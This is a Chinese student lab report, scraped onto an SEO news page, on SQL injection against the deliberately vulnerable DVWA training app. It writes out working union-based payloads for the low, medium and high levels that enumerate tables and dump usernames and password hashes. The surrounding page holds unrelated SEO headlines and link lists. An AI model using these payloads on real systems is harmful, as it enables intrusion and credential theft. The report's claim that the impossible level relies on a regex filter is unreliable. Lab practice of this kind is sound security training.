当前位置: 首页 > news >正文

网站开发 重庆苏州建网站的公司招

网站开发 重庆,苏州建网站的公司招,godaddy主机wordpress,网络营销实训总结报告【实验内容及要求】 一、内容:掌握SQL注入攻击的原理,掌握基本SQL注入攻击的方法,掌握防SQL注入攻击的基本措施。 二、要求: 1. DVWA环境配置 DVWA(Damn Vulnerable Web Application)是一个用来进行安全…

【实验内容及要求】

一、内容:掌握SQL注入攻击的原理,掌握基本SQL注入攻击的方法,掌握防SQL注入攻击的基本措施。

二、要求:

1. DVWA环境配置

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是:Brute Force(暴力破解);Command Injection(命令行注入);CSRF(跨站请求伪造);File Inclusion(文件包含);File Upload(文件上传);Insecure CAPTCHA (不安全的验证码);SQL Injection(SQL注入);SQL Injection(Blind)(SQL盲注);XSS(Reflected)(反射型跨站脚本);XSS(Stored)(存储型跨站脚本)。在DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible,可以接触一些PHP代码审计的内容。

本实验要求在下载安装并配置好DVWA实验环境,在DVWA中创建数据库,并进行登录。

2. SQL注入

在DVWA中选择SQL injection,其难度等级分为low、medium、high和impossible。随后根据自身情况进行四种等级的SQL注入实验。

3. 亦可使用sqlmap来进行SQL注入攻击实验。

【实验平台】

【实验步骤】

一、实验环境的搭建

1.将DVWA安装包解压到如图所示相应位置,并备份修改config.inc.php.dist文件配置,然后将安装包解压。

2.更改文件夹权限,并重启apache服务。

3.登录搭建好的网站,更改配置,然后点击Create/Reset Database登录。

二、Low级别的SQL注入

判断注入点。

找闭合,输入1’报错”You have an error in your SQL syntax”;输入1’’不报错,说明闭合是单引号。

输入1’ or ’1234’=’1234,获得所有First name和Surname。

输入1’ or 1=1 order by 1 #,判断有几个字段;

输入1’ or 1=1 order by 2 #;

输入1’ or 1=1 order by 3 #,说明SQL语句查询查询的表的字段数为2。

输入1’ union select 1,2 #,判断回显。

爆库,输入1’ union select 1,database() #,判断使用的数据库。

爆表,输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,获得该数据库的表名。

爆列,输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,获得user表的列名。

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,获得用户名和密码。

密码均为MD5加密,使用CMD5可进行破解。

三、Medium级别SQL注入

由于界面不允许自行输入,使用BurpSuite进行抓包。

更改为id=4 or 1=1 #&Submit=Submit可获得所有用户。

更改为id=4 order by 2 #&Submit=Submit确定列数。

更改为id=4 union select 1,2 #&Submit=Submit,判断回显。

更改为id=4 union select 1,database() #&Submit=Submit,爆库。

更改为id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()  #&Submit=Submit,爆表。

更改为id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&Submit=Submit,爆列。(其中0x7573657273为users的十六进制ascii码)

更改为id=4 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users  #&Submit=Submit,获得用户名和密码。

四、High级别SQL注入

判断注入点。

找闭合,输入1’报错”You have an error in your SQL syntax”;输入1’’不报错,说明闭合是单引号。

输入1’ or 1=1#,获得所有First name和Surname。

输入1’ or 1=1 order by 2 #,判断有几个字段;

输入1’ or 1=1 order by 3 #,说明SQL语句查询查询的表的字段数为2。

输入1’ union select 1,2 #,判断回显。

爆库,输入1’ union select 1,database() #,判断使用的数据库。

爆表,输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,获得该数据库的表名。

爆列,输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,获得user表的列名。

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,获得用户名和密码。

五、Impossible级别

无法注入,因为Impossible级别的源码使用正则表达式过滤掉了不合法的字符。

http://www.yayakq.cn/news/87290/

相关文章:

  • 江都建设网站西安网页设计制作介绍
  • 学设计网站推荐宝塔默认安装wordpress
  • 优秀的电商设计网站办公系统常用的有哪些
  • 产品做网站wordpress与phpmyadmin
  • c 网站开发网易云课堂百度云下载网站开发角色分类
  • 网站建设结项报告长沙望城建设局网站
  • 深圳公司做网站wordpress 博客主题 seo
  • 网站建设理念网站换新的空间域名解析怎么做
  • 义乌网站开发网络管理app
  • 万户网络网站建设怎么接网站建设的单子
  • 网站由哪些部分组成部分组成部分组成网络舆情处置的五个步骤
  • 英文网站如何建设怎么样制作一个公司网站
  • 做兼职工作上哪个网站招聘小程序开发视频教程
  • 网站的pv是什么用dw做的网站怎么发到网上
  • 网站代码修改无网站可以做cpc吗
  • 游戏充值网站怎么做网站管理建设总结
  • 西安专用网站建设lamp网站开发黄金组...
  • 焦作网站建设公司哪家好网站跳转怎么办
  • 上海做兼职的网站小程序制作难吗
  • 一个网站项目的价格表网站建设销售专业话术
  • 网站怎么做英语和中文的龙岩做网站改版一般多久
  • 网站 提交入口福田网站建设信科网络
  • 阿里巴巴网站做推广效果怎么样做网站pdf不能预览
  • 网站地图做法做企业网站建设常见问题
  • 手机网站内容设计方案如何做360网站优化
  • 宁夏中卫市林业生态建设局网站潍坊企业网站价格
  • 网站打开速度概念礼仪策划网站建设
  • 网站开发人员需要去做原型吗手机制作app的软件免费
  • 禅城网站制作萧山网站建设
  • 建设品牌网站的好处免费h5页面制作平台有哪些